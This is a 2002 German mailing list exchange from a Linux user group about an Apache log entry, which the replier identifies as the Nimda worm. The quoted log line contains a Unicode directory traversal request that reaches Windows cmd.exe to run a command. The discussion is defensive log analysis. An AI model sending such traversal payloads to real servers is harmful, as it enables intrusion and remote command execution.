On Mon, 2002-11-25 at 14:43, Henrik Schneider wrote: > also mein apache sieht solche dinger, und das ist nur 1% von dem was > dort geht. ich würde gern mal wissen, welche scruptkiddy-attacke > durchgehen: > das gute unicode exploid: > 80.8.122.183 - - [25/Nov/2002:14:14:40 +0100] "GET > /scripts/..Á ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 756 0 "-" > "-"
[...] Das sieht sehr nach NIMDA aus... Laurence -- Laurence Tonke Penguin User Group http://www.pug.org/~laurence/ ---------------------------------------------------------------------------- PUG - Penguin User Group Wiesbaden - http://www.pug.org
